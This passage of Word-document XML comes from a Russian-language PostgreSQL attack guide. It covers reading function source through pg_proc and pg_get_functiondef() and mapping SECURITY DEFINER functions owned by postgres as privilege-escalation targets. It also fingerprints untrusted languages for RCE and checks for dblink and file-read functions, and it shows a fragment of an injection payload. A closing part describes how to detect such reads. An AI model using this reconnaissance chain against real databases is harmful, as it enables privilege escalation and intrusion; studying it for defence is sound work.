      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">END;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что атакующий из этого извлекает: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Имя audit-таблицы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">events</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current_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — цель для обхода логирования через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path TO ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> перед основной операцией (3.13.2).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Способ построения SQL внутри функции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для имени схемы + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для параметров) — оценка, есть ли SQL-инъекция в самой функции. В этом примере код безопасный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квотит идентификатор, значения через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Уязвимый антипаттерн — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%s')</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EXECUTE 'INSERT INTO events VALUES (' || actor || ')'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — см. 3.16 (Identifier injection в plpgsql).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Косвенно: какие колонки есть в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (по списку плейсхолдеров) — экономит отдельный запрос к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(3.8.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернатива через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_get_functiondef()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — возвращает полную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-команду со всеми деталями (язык, volatility, search_path, security_definer):</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pg_get_functiondef('public.audit_event(text, text, jsonb)'::regprocedure), now() --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_get_functiondef()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступна тоже PUBLIC и работает для plpgsql/sql/plperl/plpython функций; для C-функций возвращает stub с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AS '&lt;lib&gt;', '&lt;symbol&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для plpython/plperl — возвращает их код целиком, в том числе если функция была создана </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">plpythonu</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(untrusted): тело видно атакующему, даже если у него нет EXECUTE на эту функцию.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'schema.name(types)'::regprocedure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — input-парсер типа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">regprocedure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, разрешает имя функции в её OID с учётом перегрузок (несколько функций с одним именем и разными аргументами). Альтернатива </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">::regproc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — работает только для функций без перегрузок и принимает имя без типов аргументов.</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получает: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Карту функций с пометкой SECURITY DEFINER + owner=postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — список целей для 3.13. Каждый такой вызов из application-сессии исполняется с правами postgres → если внутри функции есть инъекция через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('%s', $1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или конкатенацию, это путь к superuser. Эта связка — стандартный chain в реальных пост-эксплуатациях.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Тело функций</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — поиск SQL-инъекций внутри plpgsql/sql функций по паттернам </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('%s'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EXECUTE 'SELECT ' || </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EXECUTE 'INSERT INTO ' ||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Эти паттерны разобраны в 3.16 (Identifier injection в plpgsql).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Список доступных языков</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — fingerprint, какие RCE-вектора из 3.7 применимы (plperlu, plpython3u, plsh → 3.7.2/3.7.3).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Хинты по схеме данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — имена таблиц и колонок, упоминаемые внутри функций, экономят отдельный recon к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(3.8.1).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Список extension-функций</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WHERE p.proname LIKE 'dblink%'</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'lo\_%'</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'pg\_read%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для проверки, какие OOB/file-read функции (3.6) установлены и доступны.</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 реальная таблица в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SELECT на неё выдан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через дефолтные GRANT-ы в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">template1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Применимо ко всем колонкам, включая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Решение исторически связано с переносимостью кода: ORM, мигратор, IDE-инспектор ожидают возможность читать pg_proc без специальных прав.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для интерпретируемых языков (plpgsql, sql, plperl, plpython) — полный исходник функции. Для C-функций — символ в .so (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">int4eq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Право EXECUTE на функцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не требуется для чтения её исходного кода</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — только для вызова. Это асимметрия, на которой держится Payload B.</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pg_get_function_arguments(oid)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pg_get_function_result(oid)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pg_get_functiondef(oid)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pg_get_userbyid(oid)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pg_get_function_identity_arguments(oid)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — все доступны PUBLIC. Группа «pg_get_*» специально спроектирована для интроспекции и не делает дополнительных проверок прав.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proowner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это OID роли. Каст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">::regrole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_get_userbyid()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> конвертирует в имя; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">regrole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступен с PG 9.5+.</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prosecdef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — boolean-флаг колонки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Не зависит от прав, виден всем.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'name(types)'::regprocedure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> парсит имя на этапе AST-build, проверяет существование и однозначность (если перегрузки разрешены не точно — ошибка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">function name(...) is not unique</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PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14–17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стабилен с 7.x; добавляются новые колонки в новых major — например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prosupport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PG 12, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prosqlbody</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PG 14 — но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">proname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prolang</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prosecdef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> есть везде).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 требуются.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на чтение всех колонок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включая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См. таблицу в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.0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Конфиги GUC:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> работает при любых дефолтах. Известный edge case: с PG 14 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_proc.prosqlbody</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SQL-стандартное тело SQL-функций без оборачивания в строку, появилось в SQL:1999) хранится отдельно от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и для таких функций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пустой. Для них использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_get_functiondef()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — она объединяет оба пути.</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Чтение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от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">application-роли</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почти всегда атака. Легитимные читатели: миграторы (Alembic при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">alembic current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сверяет существование функций), ORM-reflection (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLAlchemy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inspect(engine).get_functions(schema=...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), DBA-сессии. Application в runtime запросах функции не интроспектирует.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Чтение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от application — однозначный сигнал атаки или утечки credentials через тестовый скрипт. Легитимного use case в production-коде нет.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Маркер в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_stat_activity.query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 FROM pg_proc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + JOIN на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pg_language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + фильтр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
